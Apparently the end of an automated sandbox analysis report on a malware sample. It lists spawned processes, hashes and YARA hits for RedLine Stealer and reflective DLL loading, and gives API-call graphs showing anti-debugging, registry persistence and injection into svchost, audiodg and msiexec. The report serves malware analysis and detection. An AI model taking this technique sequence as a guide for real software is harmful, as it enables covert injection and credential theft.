                                                                                                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                      Imagebase:0x7ff62d7d0000
                                                                                                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000005.00000000.1435821747.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000003.1489240627.000000000A37D000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000005.00000000.1436005236.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                      Start time:04:15:02
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe
                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe"
                                                                                                                                                                                                                      Imagebase:0x4c0000
                                                                                                                                                                                                                      File size:307'712 bytes
                                                                                                                                                                                                                      MD5 hash:7B6730CA4DA283A35C41B831B9567F15
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000000.1490441463.00000000004C2000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe, Author: Joe Security
                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                      • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                      Start time:04:15:06
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6c5db0000
                                                                                                                                                                                                                      File size:312'320 bytes
                                                                                                                                                                                                                      MD5 hash:BFAE2C479A12CBC660E580A84D3E3CE0
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                      • Detection: 58%, ReversingLabs
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                      Start time:04:15:07
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                      Start time:04:15:07
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6ec840000
                                                                                                                                                                                                                      File size:632'808 bytes
                                                                                                                                                                                                                      MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                      Start time:04:15:07
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6345c0000
                                                                                                                                                                                                                      File size:69'632 bytes
                                                                                                                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                      Start time:04:15:13
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff7f24f0000
                                                                                                                                                                                                                      File size:5'915'952 bytes
                                                                                                                                                                                                                      MD5 hash:BB0BE25BDD2121FA0BDDF6AC59D4FA8D
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                      • Detection: 33%, ReversingLabs
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                      Start time:04:15:15
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff7f24f0000
                                                                                                                                                                                                                      File size:5'915'952 bytes
                                                                                                                                                                                                                      MD5 hash:BB0BE25BDD2121FA0BDDF6AC59D4FA8D
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                      Start time:04:15:15
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6c5db0000
                                                                                                                                                                                                                      File size:312'320 bytes
                                                                                                                                                                                                                      MD5 hash:BFAE2C479A12CBC660E580A84D3E3CE0
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                      Start time:04:15:15
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                      Start time:04:15:15
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6ec840000
                                                                                                                                                                                                                      File size:632'808 bytes
                                                                                                                                                                                                                      MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                      Start time:04:15:15
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                      Imagebase:0x7ff6345c0000
                                                                                                                                                                                                                      File size:69'632 bytes
                                                                                                                                                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true


                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:43.1%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:50%
                                                                                                                                                                                                                        Total number of Nodes:480
                                                                                                                                                                                                                        Total number of Limit Nodes:11
7ff7e83c14ec LoadLibraryA GetProcAddress 1141->1322 1143 7ff7e83c1f7d 1323 7ff7e83c14ec LoadLibraryA GetProcAddress 1143->1323 1145 7ff7e83c1f97 1324 7ff7e83c14ec LoadLibraryA GetProcAddress 1145->1324 1147 7ff7e83c1fb1 1325 7ff7e83c149c LoadLibraryA GetProcAddress 1147->1325 1149 7ff7e83c1fcb 1326 7ff7e83c14ec LoadLibraryA GetProcAddress 1149->1326 1151 7ff7e83c1fe5 1327 7ff7e83c14ec LoadLibraryA GetProcAddress 1151->1327 1153 7ff7e83c1fff 1328 7ff7e83c14ec LoadLibraryA GetProcAddress 1153->1328 1155 7ff7e83c2019 1329 7ff7e83c14ec LoadLibraryA GetProcAddress 1155->1329 1157 7ff7e83c2033 1330 7ff7e83c14ec LoadLibraryA GetProcAddress 1157->1330 1159 7ff7e83c204d 1331 7ff7e83c14ec LoadLibraryA GetProcAddress 1159->1331 1161 7ff7e83c2067 1332 7ff7e83c14ec LoadLibraryA GetProcAddress 1161->1332 1163 7ff7e83c2081 1333 7ff7e83c149c LoadLibraryA GetProcAddress 1163->1333 1165 7ff7e83c209b 1334 7ff7e83c149c LoadLibraryA GetProcAddress 1165->1334 1167 7ff7e83c20b5 1335 7ff7e83c14ec LoadLibraryA GetProcAddress 1167->1335 1169 7ff7e83c20cf 1336 7ff7e83c14ec LoadLibraryA GetProcAddress 1169->1336 1171 7ff7e83c20e9 1337 7ff7e83c14ec LoadLibraryA GetProcAddress 1171->1337 1173 7ff7e83c2103 1338 7ff7e83c14ec LoadLibraryA GetProcAddress 1173->1338 1175 7ff7e83c211d 1339 7ff7e83c14ec LoadLibraryA GetProcAddress 1175->1339 1177 7ff7e83c2137 1340 7ff7e83c14ec LoadLibraryA GetProcAddress 1177->1340 1179 7ff7e83c2151 1180 7ff7e83c31ac IsDebuggerPresent 1179->1180 1181 7ff7e83c31ba 1180->1181 1182 7ff7e83c31be GetCurrentProcess CheckRemoteDebuggerPresent 1180->1182 1181->893 1181->894 1182->1181 1184 7ff7e83c3431 1183->1184 1185 7ff7e83c40ca GetTokenInformation 1183->1185 1194 7ff7e83c3ca4 GetModuleFileNameW 1184->1194 1341 7ff7e83c3b14 VirtualAlloc 1185->1341 1187 7ff7e83c40fb GetTokenInformation 1188 7ff7e83c4128 CloseHandle 1187->1188 1192 7ff7e83c4142 AdjustTokenPrivileges CloseHandle 1187->1192 1189 7ff7e83c3ae4 VirtualFree 1188->1189 1190 7ff7e83c413d 1189->1190 1190->1184 1342 
7ff7e83c3ae4 1192->1342 1195 7ff7e83c3d92 wcsncpy 1194->1195 1196 7ff7e83c3ccf PathFindFileNameW wcslen 1194->1196 1197 7ff7e83c3d09 1195->1197 1196->1197 1197->898 1199 7ff7e83c4210 GetLastError 1198->1199 1200 7ff7e83c351d 1198->1200 1199->1200 1201 7ff7e83c421d CloseHandle 1199->1201 1200->929 1200->930 1201->1200 1345 7ff7e83c3884 1202->1345 1204 7ff7e83c321c 1348 7ff7e83c42f4 CreateFileW 1204->1348 1208 7ff7e83c3704 3 API calls 1207->1208 1209 7ff7e83c3a5f 1208->1209 1210 7ff7e83c3884 11 API calls 1209->1210 1211 7ff7e83c3a69 GetModuleFileNameW DeleteFileW CopyFileW 1210->1211 1212 7ff7e83c3557 1211->1212 1213 7ff7e83c3aab SetFileAttributesW 1211->1213 1215 7ff7e83c339c GetVersionExW 1212->1215 1365 7ff7e83c3974 RegOpenKeyExW 1213->1365 1216 7ff7e83c33cd 1215->1216 1216->933 1216->934 1218 7ff7e83c3884 11 API calls 1217->1218 1219 7ff7e83c32ad 1218->1219 1368 7ff7e83c4524 CreateFileW 1219->1368 1221 7ff7e83c32c5 1222 7ff7e83c3307 CreateThread 1221->1222 1380 7ff7e83c4084 1221->1380 1222->922 1226->951 1227->953 1228->955 1229->957 1230->959 1231->961 1232->963 1233->965 1234->967 1235->969 1236->971 1237->973 1238->975 1239->977 1240->979 1241->981 1242->983 1243->985 1244->987 1245->989 1246->991 1247->993 1248->995 1249->997 1250->999 1251->1001 1252->1003 1253->1005 1254->1007 1255->1009 1256->1011 1257->1013 1258->1015 1259->1017 1260->1019 1261->1021 1262->1023 1263->1025 1264->1027 1265->1029 1266->1031 1267->1033 1268->1035 1269->1037 1270->1039 1271->1041 1272->1043 1273->1045 1274->1047 1275->1049 1276->1051 1277->1053 1278->1055 1279->1057 1280->1059 1281->1061 1282->1063 1283->1065 1284->1067 1285->1069 1286->1071 1287->1073 1288->1075 1289->1077 1290->1079 1291->1081 1292->1083 1293->1085 1294->1087 1295->1089 1296->1091 1297->1093 1298->1095 1299->1097 1300->1099 1301->1101 1302->1103 1303->1105 1304->1107 1305->1109 1306->1111 1307->1113 1308->1115 1309->1117 1310->1119 1311->1121 1312->1123 1313->1125 1314->1127 1315->1129 1316->1131 1317->1133 
1318->1135 1319->1137 1320->1139 1321->1141 1322->1143 1323->1145 1324->1147 1325->1149 1326->1151 1327->1153 1328->1155 1329->1157 1330->1159 1331->1161 1332->1163 1333->1165 1334->1167 1335->1169 1336->1171 1337->1173 1338->1175 1339->1177 1340->1179 1341->1187 1343 7ff7e83c3af5 VirtualFree 1342->1343 1344 7ff7e83c3b08 1342->1344 1343->1344 1344->1184 1354 7ff7e83c3704 GetWindowsDirectoryW 1345->1354 1347 7ff7e83c38b3 8 API calls 1347->1204 1349 7ff7e83c434a 1348->1349 1350 7ff7e83c436b GetLastError 1348->1350 1359 7ff7e83c4244 GetFileSize 1349->1359 1352 7ff7e83c322f CreateThread Sleep CreateThread 1350->1352 1352->935 1355 7ff7e83c3758 GetVolumeInformationW 1354->1355 1356 7ff7e83c374e 1354->1356 1358 7ff7e83c37d4 1355->1358 1356->1355 1357 7ff7e83c383e wsprintfW 1357->1347 1358->1357 1364 7ff7e83c3b14 VirtualAlloc 1359->1364 1361 7ff7e83c4270 1362 7ff7e83c4284 SetFilePointer ReadFile 1361->1362 1363 7ff7e83c42ba CloseHandle 1361->1363 1362->1363 1363->1352 1364->1361 1366 7ff7e83c39b9 RegSetValueExW RegCloseKey 1365->1366 1367 7ff7e83c39b5 1365->1367 1366->1367 1367->1212 1369 7ff7e83c4585 GetFileSize GetProcessHeap RtlAllocateHeap 1368->1369 1370 7ff7e83c457e 1368->1370 1371 7ff7e83c45e0 ReadFile 1369->1371 1372 7ff7e83c45ce CloseHandle 1369->1372 1370->1221 1373 7ff7e83c462f 1371->1373 1374 7ff7e83c4607 GetProcessHeap HeapFree CloseHandle 1371->1374 1372->1370 1375 7ff7e83c4648 GetProcessHeap HeapFree CloseHandle 1373->1375 1377 7ff7e83c4670 1373->1377 1374->1370 1375->1370 1376 7ff7e83c47db GetProcessHeap HeapFree CloseHandle 1376->1370 1377->1376 1378 7ff7e83c472b GetProcessHeap RtlAllocateHeap 1377->1378 1379 7ff7e83c4774 1378->1379 1379->1376 1399 7ff7e83c3fc4 CreateToolhelp32Snapshot 1380->1399 1383 7ff7e83c10d8 OpenProcess 1384 7ff7e83c111f 1383->1384 1385 7ff7e83c1115 1383->1385 1406 7ff7e83c13c4 GetModuleHandleA GetProcAddress 1384->1406 1385->1222 1387 7ff7e83c112c 1387->1385 1388 7ff7e83c11fe VirtualAllocEx 1387->1388 1388->1385 1389 7ff7e83c124f 
WriteProcessMemory 1388->1389 1389->1385 1390 7ff7e83c1286 WriteProcessMemory 1389->1390 1390->1385 1391 7ff7e83c12d1 1390->1391 1408 7ff7e83c1444 GetSystemInfo 1391->1408 1394 7ff7e83c12fe GetModuleHandleA GetProcAddress 1394->1385 1396 7ff7e83c1338 1394->1396 1395 7ff7e83c1444 GetSystemInfo 1397 7ff7e83c12f4 1395->1397 1396->1385 1398 7ff7e83c1399 CloseHandle 1396->1398 1397->1394 1397->1398 1398->1385 1400 7ff7e83c3fff Process32FirstW 1399->1400 1401 7ff7e83c32f2 1399->1401 1402 7ff7e83c4059 CloseHandle 1400->1402 1403 7ff7e83c401e wcscmp 1400->1403 1401->1383 1402->1401 1404 7ff7e83c4042 Process32NextW 1403->1404 1405 7ff7e83c4035 1403->1405 1404->1402 1404->1403 1405->1402 1407 7ff7e83c13ff 1406->1407 1407->1387 1409 7ff7e83c12ea 1408->1409 1409->1394 1409->1395 1410 7ff7e83c333c 1411 7ff7e83c24cc 37 API calls 1410->1411 1412 7ff7e83c334c 1411->1412 1430 7ff7e83c306c 1435 7ff7e83c3075 1430->1435 1431 7ff7e83c3161 1434 7ff7e83c3be4 RegDeleteKeyW 1434->1435 1435->1431 1435->1434 1436 7ff7e83c3de4 9 API calls 1435->1436 1437 7ff7e83c3974 3 API calls 1435->1437 1439 7ff7e83c4404 CreateFileW 1435->1439 1444 7ff7e83c3b44 RegOpenKeyExW 1435->1444 1436->1435 1438 7ff7e83c3151 Sleep 1437->1438 1438->1435 1440 7ff7e83c445f 1439->1440 1441 7ff7e83c449a 1439->1441 1447 7ff7e83c4384 SetFilePointer WriteFile SetEndOfFile 1440->1447 1441->1435 1443 7ff7e83c447b SetFileAttributesW CloseHandle 1443->1441 1445 7ff7e83c3bd2 1444->1445 1446 7ff7e83c3b98 RegSetValueExW RegCloseKey 1444->1446 1445->1435 1446->1445 1447->1443 1448 7ff7e83c317c 1449 7ff7e83c3185 1448->1449 1450 7ff7e83c319e 1449->1450 1453 7ff7e83c2ffc 1449->1453 1458 7ff7e83c2dfc CreateMutexA 1453->1458 1456 7ff7e83c3017 Sleep CreateThread WaitForSingleObject 1457 7ff7e83c305c Sleep 1456->1457 1457->1449 1459 7ff7e83c2e45 GetLastError 1458->1459 1460 7ff7e83c2e28 ReleaseMutex CloseHandle 1458->1460 1462 7ff7e83c2e52 ReleaseMutex CloseHandle 1459->1462 1463 7ff7e83c2e6f ReleaseMutex CloseHandle 1459->1463 1461 
7ff7e83c2e87 1460->1461 1461->1456 1461->1457 1462->1461 1463->1461 1466 7ff7e83c2e9c CreateMutexA 1467 7ff7e83c2ec1 ReleaseMutex CloseHandle 1466->1467 1468 7ff7e83c2ede GetLastError 1466->1468 1469 7ff7e83c2f20 1467->1469 1470 7ff7e83c2f08 ReleaseMutex CloseHandle 1468->1470 1471 7ff7e83c2eeb ReleaseMutex CloseHandle 1468->1471 1470->1469 1471->1469 1472 7ff7e83c2f2c 1473 7ff7e83c3884 11 API calls 1472->1473 1474 7ff7e83c2f6b 1473->1474 1475 7ff7e83c4524 17 API calls 1474->1475 1476 7ff7e83c2f8f 1475->1476 1477 7ff7e83c4084 5 API calls 1476->1477 1478 7ff7e83c2fb2 1477->1478 1479 7ff7e83c10d8 10 API calls 1478->1479 1480 7ff7e83c2fc7 GetProcessHeap HeapFree 1479->1480

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available

Control-flow Graph

• Executed
• Not Executed

Memory Dump Source
• Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
• Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
Similarity
• API ID: FileModuleName
• String ID: .reloc$@$NtUnmapViewOfSection$ntdll
• API String ID: 514040917-3001742581
• Opcode ID: cc9545668cbfd8d8ccb1ce63d766c7a505e34b9cdb4d5a45164daabb5f3f8071
• Instruction ID: dfcff3b680d66856395131fc5d7c82f8fb8c363b743f1db0dc019a48c5fc086b
• Opcode Fuzzy Hash: cc9545668cbfd8d8ccb1ce63d766c7a505e34b9cdb4d5a45164daabb5f3f8071
• Instruction Fuzzy Hash: 9B32F832608AC18AE770DB15E8547AEF3A0FBD8B45F44413ADA8D83B58DF7CD5448B25

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 297 7ff7e83c340c-7ff7e83c3422 call 7ff7e83c153c call 7ff7e83c31ac 302 7ff7e83c3424-7ff7e83c3426 ExitProcess 297->302 303 7ff7e83c342c-7ff7e83c345a call 7ff7e83c40a4 call 7ff7e83c3ca4 call 7ff7e83c3ed4 297->303 310 7ff7e83c345c-7ff7e83c346d call 7ff7e83c41e4 303->310 311 7ff7e83c34ab-7ff7e83c34be call 7ff7e83c3ed4 303->311 316 7ff7e83c3482-7ff7e83c3484 ExitProcess 310->316 317 7ff7e83c346f-7ff7e83c3480 call 7ff7e83c41e4 310->317 318 7ff7e83c34c0-7ff7e83c34d1 call 7ff7e83c41e4 311->318 319 7ff7e83c34fc-7ff7e83c350f call 7ff7e83c3ed4 311->319 317->316 326 7ff7e83c348a call 7ff7e83c329c 317->326 329 7ff7e83c34d3-7ff7e83c34d5 ExitProcess 318->329 330 7ff7e83c34db call 7ff7e83c320c 318->330 327 7ff7e83c3552-7ff7e83c3568 call 7ff7e83c3a34 call 7ff7e83c339c 319->327 328 7ff7e83c3511-7ff7e83c3522 call 7ff7e83c41e4 319->328 337 7ff7e83c348f-7ff7e83c3494 326->337 348 7ff7e83c356a-7ff7e83c357b call 7ff7e83c41e4 327->348 349 7ff7e83c35be-7ff7e83c3696 CreateThread * 3 WaitForMultipleObjects ExitProcess 327->349 344 7ff7e83c3524-7ff7e83c3526 ExitProcess 328->344 345 7ff7e83c352c call 7ff7e83c320c 328->345 335 7ff7e83c34e0-7ff7e83c34e5 330->335 339 7ff7e83c34f4-7ff7e83c34f6 ExitProcess 335->339 340 7ff7e83c34e7-7ff7e83c34f2 Sleep 335->340 342 7ff7e83c3496-7ff7e83c34a1 Sleep 337->342 343 7ff7e83c34a3-7ff7e83c34a5 ExitProcess 337->343 340->335 342->337 350 7ff7e83c3531-7ff7e83c3536 345->350 355 7ff7e83c3590-7ff7e83c3592 ExitProcess 348->355 356 7ff7e83c357d-7ff7e83c358e call 7ff7e83c41e4 348->356 352 7ff7e83c3545-7ff7e83c3547 ExitProcess 350->352 353 7ff7e83c3538-7ff7e83c3543 Sleep 350->353 353->350 356->355 359 7ff7e83c3598 call 7ff7e83c329c 356->359 361 7ff7e83c359d-7ff7e83c35a2 359->361 362 7ff7e83c35b1-7ff7e83c35b3 ExitProcess 361->362 363 
7ff7e83c35a4-7ff7e83c35af Sleep 361->363 363->361
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1413318872.00007FF7E83C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E83C0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413265435.00007FF7E83C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413340061.00007FF7E83C5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413354459.00007FF7E83C8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1413397827.00007FF7E83CB000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7e83c0000_uFVgJVXaEU.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                        • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                        • API String ID: 613740775-1953711635
                                                                                                                                                                                                                        • Opcode ID: 4720ab846c958fcdba8f4a98c12d44e859591572f9a63126b29549f3c54c881b
                                                                                                                                                                                                                        • Instruction ID: 596846811972ee949e4f7bccd99658e432d162dc3d76375e02d39af269640bd2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4720ab846c958fcdba8f4a98c12d44e859591572f9a63126b29549f3c54c881b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7061FC21A18A5285EA64FB31E85537DF2A0BF64300FC8053FD54E865A5DE3DE509C73A

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 434396405-0
                                                                                                                                                                                                                        • Opcode ID: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
                                                                                                                                                                                                                        • Instruction ID: 2faf70fcbe60861975b565da129737a68644bcc099d9e604006fd223ba227186
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b899918add7223f465711b73e7ae69a3ba479ef6b9dac702c2211ef63433b4c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A311732A1CA8186E750EB15E85072EF7A0FBE4780F54503AFA8E43B68DF3DD4418B25

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3920101602-0
